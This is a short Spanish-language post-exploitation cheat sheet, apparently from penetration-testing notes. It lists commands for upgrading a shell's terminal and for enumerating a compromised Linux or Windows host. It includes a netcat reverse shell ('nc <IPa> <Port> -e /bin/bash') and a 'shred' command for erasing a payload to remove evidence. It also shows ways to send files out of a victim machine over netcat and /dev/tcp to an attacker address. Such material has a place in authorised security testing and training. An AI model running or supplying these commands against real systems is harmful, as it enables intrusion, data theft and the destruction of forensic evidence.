Post-Explotación
Tratamiento TTY:
script /dev/null -c bash
# Ctrl + Z
stty raw -echo;fg
reset xterm
export TERM=xterm SHELL=bash
# stty -a en tu terminal para ver config
stty rows <x> cols <y>
Reenviar simple bash
nc -lvnp <Port>
nc <IPa> <Port> -e /bin/bash
Python simple shell
python -c 'import pty; pty.spawn("/bin/sh")'
Checkear
whoami # username
id # user groups
ifconfig # Config de red > IP correcta? contenedor?
env # variables de entorno > Contenedor?
uname -a # OS version
netstat -an # Conexiones de red
ps -ef # Procesos activos
whoami # username
ver # OS version
ipconfig /all # Configuración de red
set # variables de entorno
netstat -an # Conexiones de red
tasklist # Procesos activos
Borrar evidencias:
shred -zun 20 -v <payload.php> # Para qué quieres esto? Eres un blackhat?
Todo sobre transferencias:
python3 -m http.server <port>
wget <IPa>:<port>/<file>
curl -O http://<IPa>:<port>/<file>
nc -lvp 4444 < file
nc 192.168.1.102 4444 > file
Desde víctima sin netcat
# mediante cateo
cat < <file> > /dev/tcp/<IPa>/<port>
nc -lvnp <port> > <file>
SCP (ssh pwned)
scp <user>@<IPv>:/<directory>/<file> # Copiar archivo
scp -P <puerto> <user>@<IPv>:/<directory>/<file> # Si SSH no es p22
scp -r <user>@<IPv>:/<directory> # Copiar directorio
Última actualización